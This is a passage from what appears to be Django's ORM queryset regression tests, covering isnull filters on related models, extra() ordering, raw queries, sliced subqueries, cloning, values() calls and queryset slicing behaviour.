self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)
def test_ticket15316_exclude_false(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1",
special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2",
special_name="special2")
ci1 = CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.exclude(category__specialcategory__isnull=False)
self.assertEqual(qs.count(), 1)
self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)
def test_ticket15316_filter_true(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1",
special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2",
special_name="special2")
ci1 = CategoryItem.objects.create(category=c1)
CategoryItem.objects.create(category=c2)
CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.filter(category__specialcategory__isnull=True)
self.assertEqual(qs.count(), 1)
self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)
def test_ticket15316_exclude_true(self):
c1 = SimpleCategory.objects.create(name="category1")
c2 = SpecialCategory.objects.create(name="named category1",
special_name="special1")
c3 = SpecialCategory.objects.create(name="named category2",
special_name="special2")
CategoryItem.objects.create(category=c1)
ci2 = CategoryItem.objects.create(category=c2)
ci3 = CategoryItem.objects.create(category=c3)
qs = CategoryItem.objects.exclude(category__specialcategory__isnull=True)
self.assertEqual(qs.count(), 2)
self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)
def test_ticket15316_one2one_filter_false(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
CategoryItem.objects.create(category=c)
ci2 = CategoryItem.objects.create(category=c0)
ci3 = CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=False)
self.assertEqual(qs.count(), 2)
self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)
def test_ticket15316_one2one_exclude_false(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
ci1 = CategoryItem.objects.create(category=c)
CategoryItem.objects.create(category=c0)
CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=False)
self.assertEqual(qs.count(), 1)
self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)
def test_ticket15316_one2one_filter_true(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
ci1 = CategoryItem.objects.create(category=c)
CategoryItem.objects.create(category=c0)
CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=True)
self.assertEqual(qs.count(), 1)
self.assertQuerysetEqual(qs, [ci1.pk], lambda x: x.pk)
def test_ticket15316_one2one_exclude_true(self):
c = SimpleCategory.objects.create(name="cat")
c0 = SimpleCategory.objects.create(name="cat0")
c1 = SimpleCategory.objects.create(name="category1")
OneToOneCategory.objects.create(category=c1, new_name="new1")
OneToOneCategory.objects.create(category=c0, new_name="new2")
CategoryItem.objects.create(category=c)
ci2 = CategoryItem.objects.create(category=c0)
ci3 = CategoryItem.objects.create(category=c1)
qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=True)
self.assertEqual(qs.count(), 2)
self.assertQuerysetEqual(qs, [ci2.pk, ci3.pk], lambda x: x.pk, False)
class Queries5Tests(TestCase):
@classmethod
def setUpTestData(cls):
# Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the
# Meta.ordering will be rank3, rank2, rank1.
n1 = Note.objects.create(note='n1', misc='foo', id=1)
n2 = Note.objects.create(note='n2', misc='bar', id=2)
e1 = ExtraInfo.objects.create(info='e1', note=n1)
e2 = ExtraInfo.objects.create(info='e2', note=n2)
a1 = Author.objects.create(name='a1', num=1001, extra=e1)
a2 = Author.objects.create(name='a2', num=2002, extra=e1)
a3 = Author.objects.create(name='a3', num=3003, extra=e2)
cls.rank1 = Ranking.objects.create(rank=2, author=a2)
Ranking.objects.create(rank=1, author=a3)
Ranking.objects.create(rank=3, author=a1)
def test_ordering(self):
# Cross model ordering is possible in Meta, too.
self.assertQuerysetEqual(
Ranking.objects.all(),
['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
)
self.assertQuerysetEqual(
Ranking.objects.all().order_by('rank'),
['<Ranking: 1: a3>', '<Ranking: 2: a2>', '<Ranking: 3: a1>']
)
# Ordering of extra() pieces is possible, too and you can mix extra
# fields and model fields in the ordering.
self.assertQuerysetEqual(
Ranking.objects.extra(tables=['django_site'], order_by=['-django_site.id', 'rank']),
['<Ranking: 1: a3>', '<Ranking: 2: a2>', '<Ranking: 3: a1>']
)
qs = Ranking.objects.extra(select={'good': 'case when rank > 2 then 1 else 0 end'})
self.assertEqual(
[o.good for o in qs.extra(order_by=('-good',))],
[True, False, False]
)
self.assertQuerysetEqual(
qs.extra(order_by=('-good', 'id')),
['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
)
# Despite having some extra aliases in the query, we can still omit
# them in a values() query.
dicts = qs.values('id', 'rank').order_by('id')
self.assertEqual(
[d['rank'] for d in dicts],
[2, 1, 3]
)
def test_ticket7256(self):
# An empty values() call includes all aliases, including those from an
# extra()
qs = Ranking.objects.extra(select={'good': 'case when rank > 2 then 1 else 0 end'})
dicts = qs.values().order_by('id')
for d in dicts:
del d['id']
del d['author_id']
self.assertEqual(
[sorted(d.items()) for d in dicts],
[[('good', 0), ('rank', 2)], [('good', 0), ('rank', 1)], [('good', 1), ('rank', 3)]]
)
def test_ticket7045(self):
# Extra tables used to crash SQL construction on the second use.
qs = Ranking.objects.extra(tables=['django_site'])
qs.query.get_compiler(qs.db).as_sql()
# test passes if this doesn't raise an exception.
qs.query.get_compiler(qs.db).as_sql()
def test_ticket9848(self):
# Make sure that updates which only filter on sub-tables don't
# inadvertently update the wrong records (bug #9848).
# Make sure that the IDs from different tables don't happen to match.
self.assertQuerysetEqual(
Ranking.objects.filter(author__name='a1'),
['<Ranking: 3: a1>']
)
self.assertEqual(
Ranking.objects.filter(author__name='a1').update(rank='4'),
1
)
r = Ranking.objects.filter(author__name='a1')[0]
self.assertNotEqual(r.id, r.author.id)
self.assertEqual(r.rank, 4)
r.rank = 3
r.save()
self.assertQuerysetEqual(
Ranking.objects.all(),
['<Ranking: 3: a1>', '<Ranking: 2: a2>', '<Ranking: 1: a3>']
)
def test_ticket5261(self):
# Test different empty excludes.
self.assertQuerysetEqual(
Note.objects.exclude(Q()),
['<Note: n1>', '<Note: n2>']
)
self.assertQuerysetEqual(
Note.objects.filter(~Q()),
['<Note: n1>', '<Note: n2>']
)
self.assertQuerysetEqual(
Note.objects.filter(~Q() | ~Q()),
['<Note: n1>', '<Note: n2>']
)
self.assertQuerysetEqual(
Note.objects.exclude(~Q() & ~Q()),
['<Note: n1>', '<Note: n2>']
)
def test_extra_select_literal_percent_s(self):
# Allow %%s to escape select clauses
self.assertEqual(
Note.objects.extra(select={'foo': "'%%s'"})[0].foo,
'%s'
)
self.assertEqual(
Note.objects.extra(select={'foo': "'%%s bar %%s'"})[0].foo,
'%s bar %s'
)
self.assertEqual(
Note.objects.extra(select={'foo': "'bar %%s'"})[0].foo,
'bar %s'
)
class SelectRelatedTests(TestCase):
def test_tickets_3045_3288(self):
# Once upon a time, select_related() with circular relations would loop
# infinitely if you forgot to specify "depth". Now we set an arbitrary
# default upper bound.
self.assertQuerysetEqual(X.objects.all(), [])
self.assertQuerysetEqual(X.objects.select_related(), [])
class SubclassFKTests(TestCase):
def test_ticket7778(self):
# Model subclasses could not be deleted if a nullable foreign key
# relates to a model that relates back.
num_celebs = Celebrity.objects.count()
tvc = TvChef.objects.create(name="Huey")
self.assertEqual(Celebrity.objects.count(), num_celebs + 1)
Fan.objects.create(fan_of=tvc)
Fan.objects.create(fan_of=tvc)
tvc.delete()
# The parent object should have been deleted as well.
self.assertEqual(Celebrity.objects.count(), num_celebs)
class CustomPkTests(TestCase):
def test_ticket7371(self):
self.assertQuerysetEqual(Related.objects.order_by('custom'), [])
class NullableRelOrderingTests(TestCase):
def test_ticket10028(self):
# Ordering by model related to nullable relations(!) should use outer
# joins, so that all results are included.
Plaything.objects.create(name="p1")
self.assertQuerysetEqual(
Plaything.objects.all(),
['<Plaything: p1>']
)
def test_join_already_in_query(self):
# Ordering by model related to nullable relations should not change
# the join type of already existing joins.
Plaything.objects.create(name="p1")
s = SingleObject.objects.create(name='s')
r = RelatedObject.objects.create(single=s, f=1)
Plaything.objects.create(name="p2", others=r)
qs = Plaything.objects.all().filter(others__isnull=False).order_by('pk')
self.assertNotIn('JOIN', str(qs.query))
qs = Plaything.objects.all().filter(others__f__isnull=False).order_by('pk')
self.assertIn('INNER', str(qs.query))
qs = qs.order_by('others__single__name')
# The ordering by others__single__pk will add one new join (to single)
# and that join must be LEFT join. The already existing join to related
# objects must be kept INNER. So, we have both an INNER and a LEFT join
# in the query.
self.assertEqual(str(qs.query).count('LEFT'), 1)
self.assertEqual(str(qs.query).count('INNER'), 1)
self.assertQuerysetEqual(
qs,
['<Plaything: p2>']
)
class DisjunctiveFilterTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
ExtraInfo.objects.create(info='e1', note=cls.n1)
def test_ticket7872(self):
# Another variation on the disjunctive filtering theme.
# For the purposes of this regression test, it's important that there is no
# Join object related to the LeafA we create.
LeafA.objects.create(data='first')
self.assertQuerysetEqual(LeafA.objects.all(), ['<LeafA: first>'])
self.assertQuerysetEqual(
LeafA.objects.filter(Q(data='first') | Q(join__b__data='second')),
['<LeafA: first>']
)
def test_ticket8283(self):
# Checking that applying filters after a disjunction works correctly.
self.assertQuerysetEqual(
(ExtraInfo.objects.filter(note=self.n1) | ExtraInfo.objects.filter(info='e2')).filter(note=self.n1),
['<ExtraInfo: e1>']
)
self.assertQuerysetEqual(
(ExtraInfo.objects.filter(info='e2') | ExtraInfo.objects.filter(note=self.n1)).filter(note=self.n1),
['<ExtraInfo: e1>']
)
class Queries6Tests(TestCase):
@classmethod
def setUpTestData(cls):
generic = NamedCategory.objects.create(name="Generic")
t1 = Tag.objects.create(name='t1', category=generic)
Tag.objects.create(name='t2', parent=t1, category=generic)
t3 = Tag.objects.create(name='t3', parent=t1)
t4 = Tag.objects.create(name='t4', parent=t3)
Tag.objects.create(name='t5', parent=t3)
n1 = Note.objects.create(note='n1', misc='foo', id=1)
ann1 = Annotation.objects.create(name='a1', tag=t1)
ann1.notes.add(n1)
Annotation.objects.create(name='a2', tag=t4)
def test_parallel_iterators(self):
# Test that parallel iterators work.
qs = Tag.objects.all()
i1, i2 = iter(qs), iter(qs)
self.assertEqual(repr(next(i1)), '<Tag: t1>')
self.assertEqual(repr(next(i1)), '<Tag: t2>')
self.assertEqual(repr(next(i2)), '<Tag: t1>')
self.assertEqual(repr(next(i2)), '<Tag: t2>')
self.assertEqual(repr(next(i2)), '<Tag: t3>')
self.assertEqual(repr(next(i1)), '<Tag: t3>')
qs = X.objects.all()
self.assertEqual(bool(qs), False)
self.assertEqual(bool(qs), False)
def test_nested_queries_sql(self):
# Nested queries should not evaluate the inner query as part of constructing the
# SQL (so we should see a nested query here, indicated by two "SELECT" calls).
qs = Annotation.objects.filter(notes__in=Note.objects.filter(note="xyzzy"))
self.assertEqual(
qs.query.get_compiler(qs.db).as_sql()[0].count('SELECT'),
2
)
def test_tickets_8921_9188(self):
# Incorrect SQL was being generated for certain types of exclude()
# queries that crossed multi-valued relations (#8921, #9188 and some
# pre-emptively discovered cases).
self.assertQuerysetEqual(
PointerA.objects.filter(connection__pointerb__id=1),
[]
)
self.assertQuerysetEqual(
PointerA.objects.exclude(connection__pointerb__id=1),
[]
)
self.assertQuerysetEqual(
Tag.objects.exclude(children=None),
['<Tag: t1>', '<Tag: t3>']
)
# This example is tricky because the parent could be NULL, so only checking
# parents with annotations omits some results (tag t1, in this case).
self.assertQuerysetEqual(
Tag.objects.exclude(parent__annotation__name="a1"),
['<Tag: t1>', '<Tag: t4>', '<Tag: t5>']
)
# The annotation->tag link is single values and tag->children links is
# multi-valued. So we have to split the exclude filter in the middle
# and then optimize the inner query without losing results.
self.assertQuerysetEqual(
Annotation.objects.exclude(tag__children__name="t2"),
['<Annotation: a2>']
)
# Nested queries are possible (although should be used with care, since
# they have performance problems on backends like MySQL.
self.assertQuerysetEqual(
Annotation.objects.filter(notes__in=Note.objects.filter(note="n1")),
['<Annotation: a1>']
)
def test_ticket3739(self):
# The all() method on querysets returns a copy of the queryset.
q1 = Tag.objects.order_by('name')
self.assertIsNot(q1, q1.all())
def test_ticket_11320(self):
qs = Tag.objects.exclude(category=None).exclude(category__name='foo')
self.assertEqual(str(qs.query).count(' INNER JOIN '), 1)
class RawQueriesTests(TestCase):
def setUp(self):
Note.objects.create(note='n1', misc='foo', id=1)
def test_ticket14729(self):
# Test representation of raw query with one or few parameters passed as list
query = "SELECT * FROM queries_note WHERE note = %s"
params = ['n1']
qs = Note.objects.raw(query, params=params)
self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1>")
query = "SELECT * FROM queries_note WHERE note = %s and misc = %s"
params = ['n1', 'foo']
qs = Note.objects.raw(query, params=params)
self.assertEqual(repr(qs), "<RawQuerySet: SELECT * FROM queries_note WHERE note = n1 and misc = foo>")
class GeneratorExpressionTests(TestCase):
def test_ticket10432(self):
# Using an empty generator expression as the rvalue for an "__in"
# lookup is legal.
self.assertQuerysetEqual(
Note.objects.filter(pk__in=(x for x in ())),
[]
)
class ComparisonTests(TestCase):
def setUp(self):
self.n1 = Note.objects.create(note='n1', misc='foo', id=1)
e1 = ExtraInfo.objects.create(info='e1', note=self.n1)
self.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
def test_ticket8597(self):
# Regression tests for case-insensitive comparisons
Item.objects.create(name="a_b", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
Item.objects.create(name="x%y", created=datetime.datetime.now(), creator=self.a2, note=self.n1)
self.assertQuerysetEqual(
Item.objects.filter(name__iexact="A_b"),
['<Item: a_b>']
)
self.assertQuerysetEqual(
Item.objects.filter(name__iexact="x%Y"),
['<Item: x%y>']
)
self.assertQuerysetEqual(
Item.objects.filter(name__istartswith="A_b"),
['<Item: a_b>']
)
self.assertQuerysetEqual(
Item.objects.filter(name__iendswith="A_b"),
['<Item: a_b>']
)
class ExistsSql(TestCase):
def test_exists(self):
with CaptureQueriesContext(connection) as captured_queries:
self.assertFalse(Tag.objects.exists())
# Ok - so the exist query worked - but did it include too many columns?
self.assertEqual(len(captured_queries), 1)
qstr = captured_queries[0]
id, name = connection.ops.quote_name('id'), connection.ops.quote_name('name')
self.assertNotIn(id, qstr)
self.assertNotIn(name, qstr)
def test_ticket_18414(self):
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
self.assertTrue(Article.objects.exists())
self.assertTrue(Article.objects.distinct().exists())
self.assertTrue(Article.objects.distinct()[1:3].exists())
self.assertFalse(Article.objects.distinct()[1:1].exists())
@unittest.skipUnless(connection.features.can_distinct_on_fields,
'Uses distinct(fields)')
def test_ticket_18414_distinct_on(self):
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
self.assertTrue(Article.objects.distinct('name').exists())
self.assertTrue(Article.objects.distinct('name')[1:2].exists())
self.assertFalse(Article.objects.distinct('name')[2:3].exists())
class QuerysetOrderedTests(unittest.TestCase):
"""
Tests for the Queryset.ordered attribute.
"""
def test_no_default_or_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().ordered, False)
def test_cleared_default_ordering(self):
self.assertEqual(Tag.objects.all().ordered, True)
self.assertEqual(Tag.objects.all().order_by().ordered, False)
def test_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().order_by('id').ordered, True)
def test_order_by_extra(self):
self.assertEqual(Annotation.objects.all().extra(order_by=['id']).ordered, True)
def test_annotated_ordering(self):
qs = Annotation.objects.annotate(num_notes=Count('notes'))
self.assertEqual(qs.ordered, False)
self.assertEqual(qs.order_by('num_notes').ordered, True)
@skipUnlessDBFeature('allow_sliced_subqueries')
class SubqueryTests(TestCase):
@classmethod
def setUpTestData(cls):
DumbCategory.objects.create(id=1)
DumbCategory.objects.create(id=2)
DumbCategory.objects.create(id=3)
DumbCategory.objects.create(id=4)
def test_ordered_subselect(self):
"Subselects honor any manual ordering"
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2])
self.assertEqual(set(query.values_list('id', flat=True)), {3})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
self.assertEqual(set(query.values_list('id', flat=True)), {1, 2})
def test_slice_subquery_and_query(self):
"""
Slice a query that has a sliced subquery
"""
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])[0:2]
self.assertEqual({x.id for x in query}, {3, 4})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:3])[1:3]
self.assertEqual({x.id for x in query}, {3})
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])[1:]
self.assertEqual({x.id for x in query}, {2})
def test_related_sliced_subquery(self):
"""
Related objects constraints can safely contain sliced subqueries.
refs #22434
"""
generic = NamedCategory.objects.create(id=5, name="Generic")
t1 = Tag.objects.create(name='t1', category=generic)
t2 = Tag.objects.create(name='t2', category=generic)
ManagedModel.objects.create(data='mm1', tag=t1, public=True)
mm2 = ManagedModel.objects.create(data='mm2', tag=t2, public=True)
query = ManagedModel.normal_manager.filter(
tag__in=Tag.objects.order_by('-id')[:1]
)
self.assertEqual({x.id for x in query}, {mm2.id})
def test_sliced_delete(self):
"Delete queries can safely contain sliced subqueries"
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 2, 3})
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:2]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {1, 3})
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[1:]).delete()
self.assertEqual(set(DumbCategory.objects.values_list('id', flat=True)), {3})
class CloneTests(TestCase):
def test_evaluated_queryset_as_argument(self):
"#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
n = Note(note='Test1', misc='misc')
n.save()
e = ExtraInfo(info='good', note=n)
e.save()
n_list = Note.objects.all()
# Evaluate the Note queryset, populating the query cache
list(n_list)
# Use the note queryset in a query, and evaluate
# that query in a way that involves cloning.
self.assertEqual(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')
def test_no_model_options_cloning(self):
"""
Test that cloning a queryset does not get out of hand. While complete
testing is impossible, this is a sanity check against invalid use of
deepcopy. refs #16759.
"""
opts_class = type(Note._meta)
note_deepcopy = getattr(opts_class, "__deepcopy__", None)
opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model options shouldn't be cloned.")
try:
Note.objects.filter(pk__lte=F('pk') + 1).all()
finally:
if note_deepcopy is None:
delattr(opts_class, "__deepcopy__")
else:
opts_class.__deepcopy__ = note_deepcopy
def test_no_fields_cloning(self):
"""
Test that cloning a queryset does not get out of hand. While complete
testing is impossible, this is a sanity check against invalid use of
deepcopy. refs #16759.
"""
opts_class = type(Note._meta.get_field("misc"))
note_deepcopy = getattr(opts_class, "__deepcopy__", None)
opts_class.__deepcopy__ = lambda obj, memo: self.fail("Model fields shouldn't be cloned")
try:
Note.objects.filter(note=F('misc')).all()
finally:
if note_deepcopy is None:
delattr(opts_class, "__deepcopy__")
else:
opts_class.__deepcopy__ = note_deepcopy
class EmptyQuerySetTests(TestCase):
def test_emptyqueryset_values(self):
# #14366 -- Calling .values() on an empty QuerySet and then cloning
# that should not cause an error
self.assertQuerysetEqual(
Number.objects.none().values('num').order_by('num'), []
)
def test_values_subquery(self):
self.assertQuerysetEqual(
Number.objects.filter(pk__in=Number.objects.none().values("pk")),
[]
)
self.assertQuerysetEqual(
Number.objects.filter(pk__in=Number.objects.none().values_list("pk")),
[]
)
def test_ticket_19151(self):
# #19151 -- Calling .values() or .values_list() on an empty QuerySet
# should return an empty QuerySet and not cause an error.
q = Author.objects.none()
self.assertQuerysetEqual(q.values(), [])
self.assertQuerysetEqual(q.values_list(), [])
class ValuesQuerysetTests(BaseQuerysetTest):
@classmethod
def setUpTestData(cls):
Number.objects.create(num=72)
cls.identity = staticmethod(lambda x: x)
def test_flat_values_list(self):
qs = Number.objects.values_list("num")
qs = qs.values_list("num", flat=True)
self.assertValueQuerysetEqual(qs, [72])
def test_extra_values(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select=OrderedDict([('value_plus_x', 'num+%s'),
('value_minus_x', 'num-%s')]),
select_params=(1, 2))
qs = qs.order_by('value_minus_x')
qs = qs.values('num')
self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)
def test_extra_values_order_twice(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'})
qs = qs.order_by('value_minus_one').order_by('value_plus_one')
qs = qs.values('num')
self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)
def test_extra_values_order_multiple(self):
# Postgres doesn't allow constants in order by, so check for that.
qs = Number.objects.extra(select={
'value_plus_one': 'num+1',
'value_minus_one': 'num-1',
'constant_value': '1'
})
qs = qs.order_by('value_plus_one', 'value_minus_one', 'constant_value')
qs = qs.values('num')
self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)
def test_extra_values_order_in_extra(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(
select={'value_plus_one': 'num+1', 'value_minus_one': 'num-1'},
order_by=['value_minus_one'])
qs = qs.values('num')
def test_extra_select_params_values_order_in_extra(self):
# testing for 23259 issue
qs = Number.objects.extra(
select={'value_plus_x': 'num+%s'},
select_params=[1],
order_by=['value_plus_x'])
qs = qs.filter(num=72)
qs = qs.values('num')
self.assertQuerysetEqual(qs, [{'num': 72}], self.identity)
def test_extra_multiple_select_params_values_order_by(self):
# testing for 23259 issue
qs = Number.objects.extra(select=OrderedDict([('value_plus_x', 'num+%s'),
('value_minus_x', 'num-%s')]),
select_params=(72, 72))
qs = qs.order_by('value_minus_x')
qs = qs.filter(num=1)
qs = qs.values('num')
self.assertQuerysetEqual(qs, [], self.identity)
def test_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num')
self.assertQuerysetEqual(qs, [(72,)], self.identity)
def test_flat_extra_values_list(self):
# testing for ticket 14930 issues
qs = Number.objects.extra(select={'value_plus_one': 'num+1'})
qs = qs.order_by('value_plus_one')
qs = qs.values_list('num', flat=True)
self.assertQuerysetEqual(qs, [72], self.identity)
def test_field_error_values_list(self):
# see #23443
with self.assertRaisesMessage(FieldError,
"Cannot resolve keyword %r into field."
" Join on 'name' not permitted." % 'foo'):
Tag.objects.values_list('name__foo')
class QuerySetSupportsPythonIdioms(TestCase):
@classmethod
def setUpTestData(cls):
some_date = datetime.datetime(2014, 5, 16, 12, 1)
for i in range(1, 8):
Article.objects.create(
name="Article {}".format(i), created=some_date)
def get_ordered_articles(self):
return Article.objects.all().order_by('name')
def test_can_get_items_using_index_and_slice_notation(self):
self.assertEqual(self.get_ordered_articles()[0].name, 'Article 1')
self.assertQuerysetEqual(self.get_ordered_articles()[1:3],
["<Article: Article 2>", "<Article: Article 3>"])
def test_slicing_with_steps_can_be_used(self):
self.assertQuerysetEqual(self.get_ordered_articles()[::2],
["<Article: Article 1>",
"<Article: Article 3>",
"<Article: Article 5>",
"<Article: Article 7>"])
@unittest.skipUnless(six.PY2, "Python 2 only -- Python 3 doesn't have longs.")
def test_slicing_works_with_longs(self):
self.assertEqual(self.get_ordered_articles()[long(0)].name, 'Article 1')
self.assertQuerysetEqual(self.get_ordered_articles()[long(1):long(3)],
["<Article: Article 2>", "<Article: Article 3>"])
self.assertQuerysetEqual(self.get_ordered_articles()[::long(2)],
["<Article: Article 1>",
"<Article: Article 3>",
"<Article: Article 5>",
"<Article: Article 7>"])
# And can be mixed with ints.
self.assertQuerysetEqual(self.get_ordered_articles()[1:long(3)],
["<Article: Article 2>", "<Article: Article 3>"])
def test_slicing_without_step_is_lazy(self):
with self.assertNumQueries(0):
self.get_ordered_articles()[0:5]
def test_slicing_with_tests_is_not_lazy(self):
with self.assertNumQueries(1):
self.get_ordered_articles()[0:5:3]
def test_slicing_can_slice_again_after_slicing(self):
self.assertQuerysetEqual(self.get_ordered_articles()[0:5][0:2],
["<Article: Article 1>",
"<Article: Article 2>"])
self.assertQuerysetEqual(self.get_ordered_articles()[0:5][4:],
["<Article: Article 5>"])
self.assertQuerysetEqual(self.get_ordered_articles()[0:5][5:], [])
# Some more tests!
self.assertQuerysetEqual(self.get_ordered_articles()[2:][0:2],
["<Article: Article 3>", "<Article: Article 4>"])
self.assertQuerysetEqual(self.get_ordered_articles()[2:][:2],
["<Article: Article 3>", "<Article: Article 4>"])
self.assertQuerysetEqual(self.get_ordered_articles()[2:][2:3],
["<Article: Article 5>"])
# Using an offset without a limit is also possible.
self.assertQuerysetEqual(self.get_ordered_articles()[5:],
["<Article: Article 6>",
"<Article: Article 7>"])
def test_slicing_cannot_filter_queryset_once_sliced(self):
six.assertRaisesRegex(
self,
AssertionError,
"Cannot filter a query once a slice has been taken.",
Article.objects.all()[0:5].filter,
id=1,
)
def test_slicing_cannot_reorder_queryset_once_sliced(self):
six.assertRaisesRegex(
self,
AssertionError,
"Cannot reorder a query once a slice has been taken.",
Article.objects.all()[0:5].order_by,
'id',
)
def test_slicing_cannot_combine_queries_once_sliced(self):
six.assertRaisesRegex(
self,
AssertionError,
"Cannot combine queries once a slice has been taken.",
lambda: Article.objects.all()[0:1] & Article.objects.all()[4:5]
)
def test_slicing_negative_indexing_not_supported_for_single_element(self):
"""hint: inverting your ordering might do what you need"""
six.assertRaisesRegex(
self,
AssertionError,
"Negative indexing is not supported.",
lambda: Article.objects.all()[-1]
)
def test_slicing_negative_indexing_not_supported_for_range(self):
"""hint: inverting your ordering might do what you need"""
six.assertRaisesRegex(
self,
AssertionError,
"Negative indexing is not supported.",
lambda: Article.objects.all()[0:-5]
)
def test_can_get_number_of_items_in_queryset_using_standard_len(self):
self.assertEqual(len(Article.objects.filter(name__exact='Article 1')), 1)
def test_can_combine_queries_using_and_and_or_operators(self):
s1 = Article.objects.filter(name__exact='Article 1')
s2 = Article.objects.filter(name__exact='Article 2')
self.assertQuerysetEqual((s1 | s2).order_by('name'),
["<Article: Article 1>",
"<Article: Article 2>"])
self.assertQuerysetEqual(s1 & s2, [])
class WeirdQuerysetSlicingTests(BaseQuerysetTest):
@classmethod
def setUpTestData(cls):
Number.objects.create(num=1)
Number.objects.create(num=2)
Article.objects.create(name='one', created=datetime.datetime.now())
Article.objects.create(name='two', created=datetime.datetime.now())
Article.objects.create(name='three', created=datetime.datetime.now())
Article.objects.create(name='four', created=datetime.datetime.now())
def test_tickets_7698_10202(self):
# People like to slice with '0' as the high-water mark.
self.assertQuerysetEqual(Article.objects.all()[0:0], [])
self.assertQuerysetEqual(Article.objects.all()[0:0][:10], [])
self.assertEqual(Article.objects.all()[:0].count(), 0)
self.assertRaisesMessage(
AssertionError,
'Cannot change a query once a slice has been taken.',
Article.objects.all()[:0].latest, 'created'
)
def test_empty_resultset_sql(self):
# ticket #12192
self.assertNumQueries(0, lambda: list(Number.objects.all()[1:1]))
class EscapingTests(TestCase):
def test_ticket_7302(self):
# Reserved names are appropriately escaped
ReservedName.objects.create(name='a', order=42)
ReservedName.objects.create(name='b', order=37)
self.assertQuerysetEqual(
ReservedName.objects.all().order_by('order'),
['<ReservedName: b>', '<ReservedName: a>']
)
self.assertQuerysetEqual(
ReservedName.objects.extra(select={'stuff': 'name'}, order_by=('order', 'stuff')),
['<ReservedName: b>', '<ReservedName: a>']
)
class ToFieldTests(TestCase):
def test_in_query(self):
apple = Food.objects.create(name="apple")
pear = Food.objects.create(name="pear")
lunch = Eaten.objects.create(food=apple, meal="lunch")
dinner = Eaten.objects.create(food=pear, meal="dinner")
self.assertEqual(
set(Eaten.objects.filter(food__in=[apple, pear])),
{lunch, dinner},
)
def test_reverse_in(self):
apple = Food.objects.create(name="apple")
pear = Food.objects.create(name="pear")
lunch_apple = Eaten.objects.create(food=apple, meal="lunch")
lunch_pear = Eaten.objects.create(food=pear, meal="dinner")
self.assertEqual(
set(Food.objects.filter(eaten__in=[lunch_apple, lunch_pear])),
{apple, pear}
)
def test_single_object(self):
